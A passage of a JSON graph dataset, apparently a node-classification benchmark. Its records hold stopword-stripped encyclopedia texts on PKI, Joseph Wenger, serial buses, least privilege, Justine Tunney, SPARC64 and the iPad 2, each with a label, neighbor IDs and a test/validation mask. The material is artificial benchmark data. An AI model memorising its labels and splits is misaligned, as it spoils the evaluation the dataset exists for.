diffie hellman rivest shamir adleman changed secure communications entirely development high-speed digital electronic communications internet predecessors need became evident ways users could securely communicate consequence ways users could sure actually interacting assorted cryptographic protocols invented analyzed within new cryptographic primitives could effectively used invention world wide web rapid spread need authentication secure communication became still acute commercial reasons alone e.g. e-commerce online access proprietary databases web browsers sufficient taher elgamal others netscape developed ssl protocol 'https web urls included key establishment server authentication prior v3 one-way pki structure thus created web users/sites wishing secure communications vendors entrepreneurs saw possibility large market started companies new projects existing companies began agitate legal recognition protection liability american bar association technology project published extensive analysis foreseeable legal aspects pki operations see aba digital signature guidelines shortly thereafter several u.s. states utah first 1995 jurisdictions throughout world began enact laws adopt regulations consumer groups raised questions privacy access liability considerations taken consideration jurisdictions others enacted laws regulations differed technical operational problems converting pki schemes successful commercial operation progress much slower pioneers imagined would first years 21st century underlying cryptographic engineering clearly easy deploy correctly operating procedures manual automatic easy correctly design even designed execute perfectly engineering required standards existed insufficient pki vendors found market quite market envisioned mid-1990s grown slowly somewhat different ways anticipated pkis solved problems expected several major vendors gone business acquired others pki success government implementations largest pki implementation date defense information systems agency disa pki infrastructure common access cards program pkis one type another several vendors many uses including providing public keys bindings user identities used argue purchasing certificates securing websites ssl securing software code signing costly venture small businesses however emergence free alternatives let encrypt changed presently symantec holds major share pki certificate market sold one third certificates issued globally 2013 http/2 latest version http protocol allows unsecured connections theory practice major browser companies made clear would support state-of-art protocol pki secured tls connection web browser implementation http/2 including edge microsoft chrome google firefox mozilla opera supports http/2 tls using alpn extension tls protocol would mean get speed benefits http/2 website owners would forced purchase ssl certificates controlled corporations symantec current web browsers carry pre-installed intermediary certificates issued signed certificate authority means browsers need carry large number different certificate providers increasing risk key compromise key known compromised could fixed revoking certificate compromise easily detectable huge security breach browsers issue security patch revoke intermediary certificates issued compromised root certificate authority practical security vulnerabilities x.509 certificates known cases keys stolen major certificate authority listed",
    "neighbors": [
      513,
      2050,
      7683,
      517,
      7686,
      9744,
      9745,
      3097,
      2083,
      3629,
      5677,
      7736,
      62,
      7231,
      64,
      9281,
      10821,
      3657,
      11345,
      3671,
      3161,
      8283,
      7264,
      10341,
      9320,
      119,
      2169,
      3707,
      11387,
      1157,
      4746,
      651,
      1683,
      1688,
      8859,
      9884,
      3742,
      160,
      8865,
      6308,
      8358,
      1709,
      9394,
      704,
      9412,
      8391,
      5834,
      732,
      3805,
      4326,
      6381,
      5372,
      5373,
      4863,
      11520,
      257,
      1288,
      8968,
      8459,
      1297,
      8468,
      278,
      11046,
      1836,
      3377,
      11569,
      823,
      5433,
      11584,
      10071,
      1368,
      9569,
      5988,
      361,
      6509,
      2932,
      11653,
      10631,
      8584,
      3982,
      8080,
      1941,
      2970,
      6560,
      929,
      9635,
      11684,
      2470,
      3495,
      8615,
      5546,
      11693,
      5561,
      10685,
      2003,
      5078,
      5590,
      474,
      9690,
      5084,
      479,
      8674,
      7139,
      2027,
      11244,
      5107,
      501,
      1526,
      503,
      2045,
      510
    ],
    "mask": "Test"
  },
  {
    "node_id": 10832,
    "label": 4,
    "text": "Joseph_Wenger:joseph wenger joseph numa wenger june 7 1901 – september 2 1970 rear-admiral united states navy served first deputy director armed forces security agency afsa later first vice director national security agency december 1952 november 1953 separate divisions afsa merged nsa wenger one leaders responsible development nsa native patterson louisiana wenger one architects centralized cryptology february 1942 navy power struggles led ousting laurance safford op-20-g two new sections headed wenger communications decryption translation john r. redman communications combat intelligence safford removed current intelligence support research role safford sidelined remainder war ultimately joseph rochefort wenger integral starting afsa armed forces security agency predecessor nsa world war ii suggested navy spend 2 million build 360 four wheel bombes break effective british monopoly bombe died 1970",
    "neighbors": [
      289,
      4898,
      6755,
      7137,
      10305,
      11302,
      327,
      266,
      6668,
      365,
      9357,
      4719,
      7887,
      2897,
      1714,
      4566,
      2712,
      6749
    ],
    "mask": "Test"
  },
  {
    "node_id": 10833,
    "label": 5,
    "text": "Serial_communication:serial communication telecommunication data transmission serial communication process sending data one bit time sequentially communication channel computer bus contrast parallel communication several bits sent whole link several parallel channels serial communication used long-haul communication computer networks cost cable synchronization difficulties make parallel communication impractical serial computer buses becoming common even shorter distances improved signal integrity transmission speeds newer serial technologies begun outweigh parallel bus advantage simplicity need serializer deserializer serdes outstrip disadvantages clock skew interconnect density migration pci pci express example many serial communication systems originally designed transfer data relatively large distances sort data cable practically long-distance communication transmits data one bit time rather parallel reduces cost cable cables carry data serial cable computer ports plug usually referred specific name reduce confusion keyboard mouse cables ports almost invariably serial—such ps/2 port apple desktop bus usb cables carry digital video almost invariably serial—such coax cable plugged hd-sdi port webcam plugged usb port firewire port ethernet cable connecting ip camera power ethernet port fpd-link etc cables ports transmitting data one bit time include serial ata serial scsi ethernet cable plugged ethernet ports display data channel using previously reserved pins vga connector dvi port hdmi port many communication systems generally designed connect two integrated circuits printed circuit board connected signal traces board rather external cables integrated circuits expensive pins reduce number pins package many ics use serial bus transfer data speed important examples low-cost serial buses include rs-232 spi i²c dc-bus uni/o 1-wire pci express ic serial bus may typically implemented using multiplexer utilizes technique called multiplexing communication links across computers parts computers talk one another may either serial parallel parallel link transmits several streams data simultaneously along multiple channels e.g. wires printed circuit tracks optical fibers whereas serial link transmits single stream data although serial link may seem inferior parallel one since transmit less data per clock cycle often case serial links clocked considerably faster parallel links order achieve higher data rate several factors allow serial clocked higher rate many cases serial cheaper implement parallel many ics serial interfaces opposed parallel ones fewer pins therefore less expensive",
    "neighbors": [
      11536,
      7698,
      7445,
      6807,
      2968,
      408,
      799,
      4767,
      2598,
      6187,
      2989,
      3886,
      1967,
      8625,
      2994,
      1203,
      11314,
      6837,
      7865,
      11196,
      4543,
      5825,
      7108,
      1478,
      1997,
      3156,
      11477,
      9686,
      4567,
      2523,
      3042,
      4963,
      1894,
      7400,
      11627,
      5486,
      8432,
      5617,
      3445,
      886,
      5368,
      8697,
      9725
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10834,
    "label": 5,
    "text": "Kylo_(web_browser):kylo web browser kylo discontinued open-source web browser developed hillcrest labs microsoft windows mac os x initially released 2010 browser features 10-foot user interface large fonts buttons make easy see across room making especially suitable use home theater pc connected directly high-definition television 2011 kylo ces consumer electronics show innovations awards honoree category online audio/video content may 15 2012 kylo released open source software terms mozilla public license",
    "neighbors": [
      513,
      6657,
      9736,
      2579,
      6171,
      9757,
      7713,
      10791,
      9770,
      559,
      4661,
      3639,
      10808,
      3643,
      9275,
      64,
      5707,
      6231,
      8281,
      6747,
      1642,
      9834,
      9841,
      115,
      9843,
      4728,
      637,
      1664,
      2182,
      6797,
      10910,
      8351,
      7340,
      9394,
      9908,
      185,
      11449,
      4797,
      11466,
      7885,
      11469,
      9424,
      4310,
      2777,
      8923,
      737,
      4326,
      8443,
      9987,
      7943,
      278,
      7965,
      1834,
      7983,
      10057,
      11082,
      2893,
      8557,
      6528,
      3971,
      3462,
      8584,
      7572,
      5026,
      944,
      5054,
      6086,
      4048,
      5078,
      479,
      10722,
      5605,
      487,
      8169,
      494,
      1520,
      7152,
      6133,
      5622,
      5114
    ],
    "mask": "None"
  },
  {
    "node_id": 10835,
    "label": 4,
    "text": "Principle_of_least_privilege:principle least privilege information security computer science fields principle least privilege polp also known principle minimal privilege principle least authority requires particular abstraction layer computing environment every module process user program depending subject must able access information resources necessary legitimate purpose principle means giving user account process privileges essential perform intended function example user account sole purpose creating backups need install software hence rights run backup backup-related applications privileges installing new software blocked principle applies also personal computer user usually work normal user account opens privileged password protected account superuser situation absolutely demands applied users terms least user access least-privileged user account lua also used referring concept user accounts times run privileges possible also launch applications privileges possible principle least privilege widely recognized important design consideration enhancing protection data functionality faults fault tolerance malicious behavior computer security benefits principle include practice exist multiple competing definitions true least privilege program complexity increases exponential rate number potential issues rendering predictive approach impractical examples include values variables may process addresses need precise time things required object capability systems allow instance deferring granting single-use privilege time used currently closest practical approach eliminate privileges manually evaluated unnecessary resulting set privileges typically exceeds true minimum required privileges process another limitation granularity control operating environment privileges individual process practice rarely possible control process access memory processing time i/o device addresses modes precision needed facilitate precise set privileges process require original formulation jerome saltzer peter j. denning paper fault tolerant operating systems set broader perspective among four fundamental principles fault tolerance dynamic assignments privileges earlier discussed roger needham 1972 historically oldest instance least privilege probably source code login.c begins execution super-user permissions and—the instant longer necessary—dismisses via setuid non-zero argument demonstrated version 6 unix source code kernel always runs maximum privileges since operating system core hardware access one principal responsibilities operating system particularly multi-user operating system management hardware availability requests access running processes kernel crashes mechanisms maintains state also fail therefore even way cpu recover without hard reset security continues enforced operating system properly respond failure possible detect failure kernel execution either halted program counter resumed execution somewhere endless and—usually—non-functional loop would akin either experiencing amnesia kernel execution failure trapped closed maze always returns starting point closed loops execution picks crash loading running trojan code author trojan code usurp control processes principle least privilege forces code run lowest privilege/permission level possible means code resumes code execution-whether trojan simply code execution picking unexpected location—would ability perform malicious undesirable processes one method used accomplish implemented microprocessor hardware example intel x86 architecture manufacturer designed four ring 0 ring 3 running modes graduated degrees access-much like security clearance systems defence intelligence agencies implemented operating systems processes execute potential privilege set active privilege set privilege sets inherited parent determined semantics fork executable file performs privileged function—thereby technically constituting component tcb concomitantly termed trusted program trusted process—may also marked set privileges logical extension notions set user id set group id inheritance file privileges process determined semantics exec family system calls precise manner potential process privileges actual process privileges file privileges interact become complex practice least privilege practiced forcing process run privileges required task adherence model quite complex well error-prone trusted computer system evaluation criteria tcsec concept trusted computing base tcb minimization far stringent requirement applicable functionally strongest assurance classes viz b3 a1 evidentiarily different functionally identical least privilege often associated privilege bracketing assuming necessary privileges last possible moment dismissing soon longer strictly necessary therefore ostensibly reducing fallout erroneous code unintentionally exploits privilege merited least privilege also interpreted context distribution discretionary access control dac permissions example asserting giving user u read/write access file f violates least privilege u complete authorized tasks read permission",
    "neighbors": [
      256,
      6403,
      10756,
      2951,
      10631,
      9739,
      13,
      6797,
      10511,
      8466,
      7187,
      8344,
      537,
      10392,
      9244,
      6813,
      2975,
      3488,
      3999,
      10146,
      5030,
      4777,
      2221,
      174,
      2477,
      7983,
      2737,
      7480,
      3643,
      700,
      3516,
      7739,
      9791,
      10813,
      4034,
      4423,
      4552,
      7368,
      7884,
      2253,
      4174,
      9677,
      11596,
      1745,
      3283,
      10580,
      728,
      1113,
      10968,
      7515,
      8798,
      4067,
      10340,
      8551,
      4968,
      6888,
      3178,
      5483,
      9705,
      1776,
      3700,
      6902,
      7030,
      10614,
      8954,
      7804,
      5373,
      2558,
      5503
    ],
    "mask": "Test"
  },
  {
    "node_id": 10836,
    "label": 4,
    "text": "Justine_Tunney:justine tunney justine alexandra roberts tunney born c. 1985 software developer former occupy movement activist blogger like many former black hat hackers kevin mitnick tunney participated sides cybersecurity black hat white hat tunney case first computer hacker later life volunteer fixing security vulnerabilities open source software 1999 age 14 operating online name oogle tunney built rampage toolz 2.o exploiting security vulnerabilities aol sending spam tunney said rampage toolz popular third-party aol prog time ran ads site height dot-com boom earned hundreds dollars month teenager know tunney stated never heard google time similar name oogle coincidence tunney published screenshots rampage toolz oogle.net website source code tool statute limitations expired 2016 employee google tunney discovered open source projects github vulnerable security vulnerability discovered five months previously software library projects used called apache commons collections started raising pull requests github fix problems recruiting volunteers scale problem became apparent team volunteers swelled 50 google employees working 20 time ultimately tunney coworkers used bigquery discover vulnerable github software projects discovered 2,600 projects time directly indirectly vulnerable sent pull requests close security holes also raised public awareness severe cybersecurity threat posed continued use vulnerable versions libraries subsequent post google open source blog effort noting san francisco municipal transportation agency recently hacked ransomware due usage vulnerable version apache commons collections 2011 kalle lasn founder left-wing magazine adbusters put call activists occupy wall street response perceived political corruption american democracy wall street context 2008 financial crisis aftermath tunney one first individuals respond lasn call quickly creating occupywallst twitter handle occupywallst.org web site july 14 2011 became main online hub occupy movement february 2014 tunney took back exclusive control occupy wall street twitter account originally created removing posting access activists previously access stated founding organizer movement wrote locked twitter account partly order keep mouthpiece democratic party also said large number twitter users misogynist transphobic tunney described occupy wall street far-left movement former comrades described technocratic fascist written viewed activists within occupy wall street disagreed taking initiative ows movement sat meetings trying devise ways boss around unskilled unintelligent parasites tunney vocal supporter gamergate movement contributed unsuccessful crowdfunding campaign create gamergate movement website posted support gamergate movement occupy wall street twitter account tunney prolific blogger twitter user often writes political topics twitter personal blogs websites political writing sometimes controversial extreme degree daily dot vice various twitter users speculated might trolling performing online performance art might expressing sincerely held views daily dot cited tunney saying free speech rights respected techies progressives hopefully 'll live see day muckraking progressive reporters/bloggers sent prisons tunney characterised activities trolling multiple times since march 2014 response question put askfm regards asker suspicion tunney trying deliberately piss liberals tunney wrote answer included sentence favorite tactic trolling progressives simply use newspeak tunney also said trolling way get away saying certain things current regime tunney said entirely different person offline 2014 tunney petitioned us government people hold referendum asking support retire government employees full pensions transfer administrative authority technology industry appoint google chairman eric schmidt ceo america tunney works software engineer google petition expired failed meet people signature threshold doctors found tumor 2012 since removed",
    "neighbors": [
      488,
      1970,
      5636,
      3269
    ],
    "mask": "Test"
  },
  {
    "node_id": 10837,
    "label": 3,
    "text": "HAL_SPARC64:hal sparc64 sparc64 microprocessor developed hal computer systems fabricated fujitsu implements sparc v9 instruction set architecture isa first microprocessor sparc64 hal first microprocessor first sparc64 brand operates 101 118 mhz sparc64 used exclusively fujitsu systems first systems fujitsu halstation model 330 model 350 workstations formally announced september 1995 introduced october 1995 two years late succeeded sparc64 ii previously known sparc64+ 1996 sparc64 superscalar microprocessor issues four instructions per cycle executes order multichip design consisting seven dies cpu die mmu die four cache dies clock die cpu die contains majority logic execution units level 0 l0 instruction cache execution units consist two integer units address units floating-point units fpus memory units fpu hardware consists fused multiply add fma unit divide unit fma instructions really fused single rounding sparc64 vi fma unit pipelined four-cycle latency one-cycle-throughput divide unit pipelined significantly longer latencies l0 instruction cache capacity 4 kb direct-mapped one-cycle latency cpu die connected cache mmu dies ten 64-bit buses four address buses carrying virtual addresses lead cache die two data buses write data register file two cache dies implement data cache four buses one cache die deliver data instructions cpu cpu die contained 2.7 million transistors dimensions 17.53 mm 16.92 mm area 297 mm 817 signal bumps 1,695 power bumps mmu die contains memory management unit cache controller external interfaces sparc64 separate interfaces memory input/output i/o bus used access memory 128 bits wide system interface hal i/o hio bus 64-bit asynchronous bus mmu die area 163 mm four dies implement level 1 l1 instruction data caches require two dies caches capacity 128 kb latency caches three cycles caches four-way set associative data cache protected error correcting code ecc parity uses 128-byte line size cache die implements 64 kb cache portion cache tags cache die contains 4.3 million transistors dimensions 14.0 mm 10.11 mm die area 142 mm 1,854 solder bumps 446 signals 1408 power sparc64 consisted 21.9 million transistors fabricated fujitsu cs-55 process 0.40 µm four-layer metal complementary metal–oxide–semiconductor cmos process seven dies packaged rectangular ceramic multi-chip module mcm connected underside mcm solder bumps mcm 565 pins 286 signal pins 218 power pins organized pin grid array pga mcm wide buses connect seven dies sparc64 ii sparc64+ development sparc64 second-generation sparc64 microprocessor operated 141 161 mhz used fujitsu halstation model 375 141 mhz model 385 161 mhz workstations introduced november 1996 december 1996 respectively sparc64 ii succeeded sparc64 iii 1998 sparc64 ii higher performance due higher clock frequencies enabled new process circuit tweaks higher instructions per cycle ipc count due following microarchitecture improvements fabricated fujitsu cs-60 process 0.35 µm five-layer metal cmos process new process reduced area dies cpu die measuring 202 mm mmu die 103 mm cache die 84 mm sparc64 gp series related microprocessors developed hal fujitsu used fujitsu gp7000f primepower servers first sparc64 gp development sparc64 ii third-generation sparc64 microprocessor known sparc64 iii introduced sparc64 gp operated clock frequencies 225 250 275 mhz first microprocessor hal support multiprocessing main competitors hp pa-8500 ibm power3 sun ultrasparc ii sparc64 gp taped july 1997 announced 11 april 1998 225 250 mhz versions introduced december 1998 275 mhz version introduced march 1999 single-die implementation sparc64 ii integrated modifications cpu die two four cache dies numerous modifications improvements made microarchitecture replacement mmu new system interface using ultra port architecture improved branch prediction extra pipeline stage improve clock frequencies second fpu could execute add subtract instructions fpu less functionality added instead duplicate first save die area second fpu half size first three-cycle latency instructions complex sparc64 ii memory management unit mmu replaced simpler one compatible solaris operating system previously sparc64 systems ran sparc64/os derivative solaris developed hal supported sparc64 l1 caches halved capacity 64 kb 128 kb reduce die area reason two four cache dies integrated sparc64 ii associated performance loss mitigated provision large external l2 cache capacity 1 16 mb l2 cache accessed dedicated 128-bit data bus operates half clock frequency microprocessor l2 cache inclusive super-set l1 caches l1 l2 cache data protected ecc tags parity sparc64 ii proprietary system interface replaced one compatible ultra port architecture enabled sparc64 iii use chipsets sun microelectronics system bus operates half third quarter fifth frequency microprocessor maximum 150 mhz contained 17.6 million transistors 6 million logic 11.6 million contained caches tlbs die area 210 mm fabricated fujitsu cs-70 process 0.24 µm five-layer metal cmos process packaged 957-pad flip-chip land grid array lga package dimensions 42.5 mm 42.5 mm 957 pads 552 signals 405 power ground internal voltage 2.5 v i/o voltage 3.3 v. peak power consumption 60 w 275 mhz ultra port architecture upa signals compatible 3.3 v low voltage transistor transistor logic lvttl levels exception differential clock signals compatible 3.3 v pseudo emitter coupled logic pecl levels second third sparc64 gps fourth generation sparc64 microprocessors second sparc64 gp development first operated 400 563 mhz first versions operating 400 450 mhz introduced 1 august 2000 larger l1 instruction data caches doubled capacity 128 kb better branch prediction result larger bht consisting 16,384 entries support visual instruction set vis l2 cache built double data rate ddr sram contained 30 million transistors fabricated fujitsu cs80 process 0.18 µm cmos process six levels copper interconnect used 1.8 v internal power supply 2.5 3.3 v power supply i/o packaged 1,206-contact ball grid array bga measuring 37.5 mm 37.5 mm 1,206 contacts 552 signals 405 power ground third sparc64 gp identical second terms microarchitecture operated 600 810 mhz first versions introduced 2001 700 788 810 mhz versions introduced 17 july 2002 fabricated fujitsu 0.15 µm cs85 process six levels copper interconnect used 1.5 v internal power supply 1.8 2.5 v power supply i/o",
    "neighbors": [
      6926,
      6815,
      36,
      9766,
      8231,
      1707,
      9137,
      1725,
      9920,
      4172,
      3919,
      5329,
      1503,
      3431,
      5358,
      1776,
      1399,
      9976,
      10108
    ],
    "mask": "None"
  },
  {
    "node_id": 10838,
    "label": 2,
    "text": "IPad_2:ipad 2 ipad 2 tablet designed developed marketed apple inc compared first ipad second model ipad line gained faster dual core a5 processor lighter build structure first ipad feature vga front-facing 720p rear-facing cameras designed facetime video calling device available initially three storage sizes – 16 32 64gb – two varying connectivity options – wi-fi wi-fi cellular variation device available either black white front glass panel however upon release 3rd generation ipad march 2012 16gb variation two connectivity options two front color options remained available product became available march may 2011 device received mixed positive reception various blogs publications although praised hardware improvement new apple a5 chip software restriction ipad 2 ios general drew criticism various technology commentators device sold well first month sales 2.4–2.6 million units sold 11.12 million units sold third quarter 2011 popular product lower screen resolution performance two retina models followed lighter build longer battery life remained apple line-up entry-level ipad model three years march 2014 latterly silent upgrade die-shrunk version a5 processor basic design formed core first ipad mini screen pixel count similar features smaller size ipad 2 device receive six major versions ios 4 9 ios 12 released iphone 5s ipad air ipad mini 2 apple sent invitations journalists february 23 2011 media event march 2 march 2 2011 ceo steve jobs unveiled device yerba buena center arts despite medical leave upon announcement ipad 2 original ipad discontinued sales online apple authorized retail stores apple began selling ipad 2 website march 11 u.s. retail stores 5 pm local time date many stores major cities new york sold within hours online shipping delays increased three four weeks sunday four five weeks tuesday ipad 2 released internationally 25 countries march 25 2011 countries included australia austria belgium canada czech republic denmark finland france germany greece iceland italy ireland hungary luxembourg mexico netherlands new zealand norway poland portugal spain sweden switzerland united kingdom april 29 2011 release date japan postponed due earthquake tsunami struck nation march 11 2011 ipads delayed due nand flash storage chip used ipads created toshiba affected earthquake tsunami thus resulting suspension operations indefinite period time slowdown caused analysts downgrade apple stock ipad 2 later released hong kong south korea singapore philippines malaysia countries including japan april 29 2011 released numerous nations include china estonia thailand brazil russia taiwan two major release dates may 6 27 32 64gb models discontinued march 7 2012 upon introduction third generation ipad 16gb wi-fi 16gb wi-fi 3g models discontinued march 18 2014 late march 2011 ipad 2 released alongside ios 4.3 primarily introduced airplay mirroring home sharing among features october 12 2011 upon release iphone 4s ipad upgradable ios 5 firmware brought 200 new user features ios compatible devices including notification center imessage reminders updated notifications system using new banner style instead previously used pop-up alert style ipad 2 comes several applications default including safari mail photos video music itunes store maps notes calendar photo booth contacts app store also available default application enables users download database 800,000 applications price applications set developers like ios devices ipad 2 sync music videos apps photos mac pc using itunes although using ios 5 later user connect ipad computer icloud also allows users backup sync data compatible ios devices via internet game center available native social gaming platform ios games downloaded via app store feature enabled able integrate achievement points high-scores bonus system across ios devices single accumulative points social platform although tablet designed make phone calls cellular network user use wired headset built-in speaker microphone place phone calls wi-fi cellular using voip application ipad 2 also adds ability run garageband imovie iwork apps pages keynote numbers applications come ipad instead official applications apple sold within app store march 7 2012 unveiling third generation ipad firmware ipad 2 upgradable ios 5.1 scott rohde senior sony executive described ipad game console disguised device appropriated business workplace september 19 2012 almost week announcement iphone 5 ios 6 released numerous ios devices including ipad 2 however ios 6 features available ipad 2 software upgrade downloadable air ota update package contains two-hundred new features including mapping software designed apple dubbed apple maps clock app features timer stopwatch alarm facebook integration among new features tweaks ipad 2 compatible ios 7 released september 18 2013 however features available example like iphone 4 notification center control center use transparent style instead translucent style later ios models also airdrop first released ios 7 supported ipad 4 later ipad 2 run ios 8 released september 17 2014 making first ios device run five major versions ios including ios 4 5 6 7 8 os runs device new features work relatively aged hardware therefore performance limited users also reported numerous problems receiving update including accessibility features battery-related issues many users predicted ipad 2 going dropped updating ios 8 along iphone 4 process happened iphone 3gs ipod touch fourth generation earlier models considering model 3 years old confirmed june 8 2015 apple wwdc ipad 2 would run ios 9 made ipad 2 first ios device run six major versions ios previous releases though many headline features unavailable ipad 2 including predictive siri translucency effects split-view slide-over picture-in-picture multitasking health app ios 9 said feature performance improvements may help aging device function smoothly initial tests suggest significantly impact available space a5-based devices also run ios 9 including iphone 4s five major ios versions ipad mini four major ios versions ipod touch 5g four major ios versions june 13 2016 release ios 10 apple dropped continuing compatibility ipad 2 hardware limitations goes ipad 3rd generation ipad mini 1st generation making ios 9 final version run device ipad 2 one many computers mobile devices susceptible broadpwn exploit publicized july 2017 apple quickly released update ios 10 fix problem fix never released ios 9 earlier versions ios result older apple devices incompatible ios 10 including ipad 2 left vulnerable indefinitely raised concerns potentially widespread attacks using exploit particularly locations concentrated ipad 2 deployment certain primary secondary schools january 2018 apple suddenly started firmware signing ios 6.1.3 ipad 2 iphone 4s allowing users downgrade devices ios 6. ios 8 available over-the-air update ios 6 allowing users update devices ios 8.4.1 august 2019 still supported ipad 2 features apple a5 package-on-package pop system-on-chip soc comprises 1 ghz dual-core 32-bit cortex-a9 cpu 512 mb ram dual-core powervr sgx543mp2 gpu features include front rear cameras three-axis gyroscope headset controls proximity ambient light sensors microphone magnetometer accelerometer 9.7 inch multi-touch screen maximum resolution 1024×768 hence resulting 132 ppi ipad 2 four physical switches including home button near display returns user home screen three plastic physical switches sides wake/sleep volume up/down third switch either screen rotation lock mute home button ipad 2 easier double tap previous generation ipad apple reduced size ipad eliminating stamped sheet metal frame display integrating new thinner glass technology touch screen overlay slightly reducing space display battery ipad 2 screen thinner lighter yet stronger original ipad ipad 2 also supports screen mirroring via digital av adapter airplay ios 5 ipad 2 25 w·h rechargeable lithium-ion polymer battery lasts 10 hours like original ipad charged via usb included 10 w 2 power adapter battery 2.5 mm thick 59 smaller original three cells instead two improvements allowed injection-molded plastic support frame omitted 10 w usb power adapter provides 4x power conventional usb port tablet audio frequency response 20 hz 20 khz without third-party software play following audio formats he-aac aac protected aac mp3 mp3 vbr audible formats 2 3 4 aea aax aax+ alac aiff wav revised tablet adds front- rear-facing cameras allow facetime video calls ipad 2s third generation ipad iphone 4 4s fourth-generation ipod touch macintosh computers running mac os x 10.6.6 later webcam 0.3 mp front camera shoots vga-quality 30 frame/s video vga-quality still photos 0.7 mp back camera shoot 720p hd video 30 frame/s 5× times digital zoom shoot photo fullscreen aspect ratio rear camera shoots video 16:9 widescreen match 720p standard although central 4:3 part recording shown screen recording forward-facing camera shoots 4:3 apple a5 chip doubles processing speed graphics processing nine times faster previous ipad however benchtests hardware assessments performed various third party news sources technology blogs indicate claims exaggerated benchmark assessment conducted anandtech showed gpu ipad 2 3 times faster original ipad cpu benchmarks conducted ipad 2 iosnoops indicate 66 performance increase compared original ipad 3g versions ipad 2 offer cdma2000 support customers using device cdma network gsm/umts support customers using device gsm/umts network ipad wi-fi 3g model includes a-gps receiver tracking user location given permission also ipad 2 3g model includes plastic cap-like band top back 3g antenna metallic grille microphone replaced matching plastic black grille 3g model gsm models ipad 2 use sim card cdma models use esn connect cellular network device 15 lighter 33 thinner original ipad thinner iphone 4 0.5 mm wi-fi version gsm cdma versions known respectively verizon versions us differ weight slightly due mass difference gsm cdma cellular radios gsm model cdma model size ipad 2 also less original ipad 9.50×7.31×0.34 241.2×185.7×8.8 mm compared original ipad size 9.56×7.47×0.5 242.8×189.7×13.4 mm announcement release third generation ipad ipad 2 continued available purchase received hardware upgrade upgraded variant ipad 2 features smaller version apple a5 soc able reduce battery consumption benchmark tests conducted anandtech concluded upgraded variant able last longer least hour half depending task conducted device maximum temperature device heated also less original ipad 2 tests conducted organisation revealed upgraded variant able operate 1 degree lower performing intensive tasks performance difference two variants according anandtech negligible smart cover first introduced ipad 2 screen protector magnetically attaches face ipad cover three folds allow convert stand also held together magnets original ipad owners could purchase black case included similarly folding cover smart cover meant minimal easily detachable protects screen smart covers microfiber bottom cleans front ipad wakes ipad cover removed five different colors polyurethane leather leather expensive polyurethane version apple offers several accessories ipad 2 adapters proprietary 30-pin dock connector ipad port besides headphone jack dock holds ipad upright angle dock connector audio line port ipad use bluetooth keyboards also work macs pcs ipad charged standalone power adapter wall charger also used ipods iphones 10 w charger included ipad ipad 2 received mixed positive reviews praising apple a5 processor 720p camera joshua topolsky engadget said n't yet made leap feel free take deep breath dive – ipad 2 good gets right really quite good jason snell macworld said following though ipad 2 improvement original ipad numerous ways ’ still evolutionary product revolutionary one ’ happy current ipad ’ reason dump ’ shinier newer one say millions people ’ mean shiny ’ invested ipad accessories dock case keep mind probably ’ able use new ipad techcrunch mg siegler stated let sum simple way ipad 2 buy one maybe — depends factors want buy one yes use information wisely closed proprietary nature ios garnered criticism particularly digital rights advocates electronic frontier foundation computer engineer activist brewster kahle internet-law specialist jonathan zittrain free software foundation protested ipad introductory event targeted ipad defective design campaign competitor microsoft via pr spokesman also criticized apple control platform issue restrictions imposed design ios namely drm intended lock purchased media apple platform development model requiring yearly subscription distribute apps developed ios centralized approval process apps well apple general control lockdown platform particularly issue ability apple remotely disable delete apps tech community expressed concern locked-down ios represents growing trend apple approach computing particularly apple shift away machines hobbyists tinker note potential restrictions stifle software innovation ipad 2 users reported performance issues running ios 8 apple improved performance ipad 2 iphone 4s ios 8.1.1 update however 2 devices still n't run fast later models first weekend sale one million units sold soon first weekend ashok kumar technology analyst financial firm predicted apple would sell 35 million ipad 2s 2011 investment banking firm piper jaffray monitored initial sales ipad 2 reported 70 ipad 2 sales first-time ipad buyers 49 buyers owning pc compared initial buyers original ipad 26 buyers owned pc 12,000 units sold auction site ebay first two weeks release iphone 4s released rumors third generation ipad caused decline ipad 2 sales official figures released fourth quarter 2011 indicate apple sold 11.4 million ipads third quarter 166 increase third quarter 2010 product helped create newer larger markets apple south east asia 2011 two ipad 2 tablets taken international space station approved apple products taken iss include ipod also two iphone 4 phones personal computing system aboard iss various versions thinkpad laptop ibm later lenovo brand applications ipads used include angry birds game iss fit international space station food intake tracker tracking astronauts food consumption",
    "neighbors": [
      10755,
      9732,
      1549,
      5647,
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      6183,
      1576,
      6186,
      4139,
      6700,
      7211,
      1074,
      8754,
      9784,
      1083,
      8253,
      576,
      7745,
      1090,
      8783,
      4180,
      1623,
      3672,
      10840,
      9312,
      3681,
      9826,
      8806,
      3691,
      2673,
      6258,
      10357,
      6264,
      4220,
      7292,
      2686,
      6783,
      7806,
      10365,
      10878,
      4741,
      8842,
      6283,
      7824,
      147,
      7830,
      6807,
      5784,
      1177,
      4251,
      3228,
      2207,
      4258,
      4259,
      7842,
      7844,
      11430,
      171,
      2735,
      3248,
      4283,
      3772,
      7869,
      8893,
      1728,
      8896,
      6654,
      4807,
      4810,
      3790,
      1744,
      2258,
      3286,
      9430,
      3293,
      4318,
      8413,
      9952,
      6884,
      231,
      3304,
      2282,
      9451,
      1772,
      4844,
      1776,
      10481,
      3828,
      4855,
      7420,
      1290,
      3338,
      781,
      4879,
      784,
      9999,
      10512,
      4888,
      5912,
      8480,
      5927,
      10023,
      2345,
      4910,
      4399,
      7983,
      7991,
      11066,
      2363,
      2365,
      2366,
      9022,
      11257,
      1346,
      10562,
      838,
      7496,
      8525,
      2388,
      8534,
      3928,
      8540,
      4957,
      6495,
      8544,
      9063,
      10602,
      3948,
      11629,
      10608,
      9084,
      7549,
      11649,
      2439,
      6023,
      3977,
      6537,
      6539,
      7052,
      1428,
      3483,
      10658,
      2979,
      9123,
      11173,
      8109,
      8627,
      10675,
      2492,
      446,
      7614,
      5058,
      10691,
      2502,
      456,
      1482,
      9163,
      7118,
      464,
      6608,
      8662,
      9174,
      10199,
      8665,
      7133,
      9182,
      4068,
      5093,
      487,
      488,
      2023,
      8170,
      5616,
      6130,
      7154,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "None"
  },
  {
    "node_id": 10839,
    "label": 2,
